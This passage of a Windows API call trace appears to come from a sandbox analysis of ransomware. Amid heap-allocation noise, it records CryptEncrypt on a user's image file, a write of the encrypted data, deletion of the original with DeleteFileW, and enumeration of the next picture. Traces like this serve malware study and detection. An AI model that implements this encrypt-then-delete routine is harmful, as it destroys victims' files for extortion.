hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.676] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0094.676] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0094.676] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0094.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0094.677] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0094.678] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xc97b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xc980) returned 1 [0094.678] CharLowerBuffW (in: lpsz="byte[51585]", cchLength=0xb | out: lpsz="byte[51585]") returned 0xb [0094.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb018, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0094.679] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453bca8*, pdwDataLen=0x144e538*=0xc97b, dwBufLen=0xc980 | out: pbData=0x453bca8*, pdwDataLen=0x144e538*=0xc980) returned 1 [0094.679] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.679] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xc980, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xc980, lpOverlapped=0x0) returned 1 [0094.705] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0094.705] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca898, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0094.705] CryptDestroyKey (hKey=0x41ac280) returned 1 [0094.705] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.705] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.709] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.709] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.709] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0094.709] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0094.709] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.709] FreeLibrary (hLibModule=0x756e0000) returned 1 [0094.710] CloseHandle (hObject=0x298) returned 1 [0094.710] CloseHandle (hObject=0x258) returned 1 [0094.712] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\OjV9.png", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\OjV9.png", lpFilePart=0x0) returned 0x28 [0094.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0094.712] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\OjV9.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\ojv9.png")) returned 0x20 [0094.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0094.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0094.713] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\OjV9.png", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae77f70, ftCreationTime.dwHighDateTime=0x1d5e5bc, ftLastAccessTime.dwLowDateTime=0xf924a990, ftLastAccessTime.dwHighDateTime=0x1d5e9f0, ftLastWriteTime.dwLowDateTime=0xf924a990, ftLastWriteTime.dwHighDateTime=0x1d5e9f0, nFileSizeHigh=0x0, nFileSizeLow=0xc97b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="OjV9.png", cAlternateFileName="")) returned 0x41ac440 [0094.714] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\OjV9.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\ojv9.png")) returned 1 [0094.719] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae77f70, ftCreationTime.dwHighDateTime=0x1d5e5bc, ftLastAccessTime.dwLowDateTime=0xf924a990, ftLastAccessTime.dwHighDateTime=0x1d5e9f0, ftLastWriteTime.dwLowDateTime=0xf924a990, ftLastWriteTime.dwHighDateTime=0x1d5e9f0, nFileSizeHigh=0x0, nFileSizeLow=0xc97b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="OjV9.png", cAlternateFileName="")) returned 0 [0094.720] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0094.720] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0094.720] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0094.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9e48 | out: hHeap=0x1780000) returned 1 [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0094.721] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0094.721] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0094.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0094.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0094.721] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0094.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0094.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0094.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0094.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0094.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0094.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0094.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0094.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0094.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0094.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0094.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0094.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0094.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0094.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f50 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0094.722] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0094.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0094.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0094.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0094.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0094.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.723] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0094.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0094.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0094.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.723] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\W ZDfbD_wanSc.gif", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f70a7d0, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xd4154c50, ftLastAccessTime.dwHighDateTime=0x1d5eda5, ftLastWriteTime.dwLowDateTime=0xd4154c50, ftLastWriteTime.dwHighDateTime=0x1d5eda5, nFileSizeHigh=0x0, nFileSizeLow=0xf2e9, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="W ZDfbD_wanSc.gif", cAlternateFileName="WZDFBD~1.GIF")) returned 0x41ac180 [0094.723] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0094.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0094.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0094.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 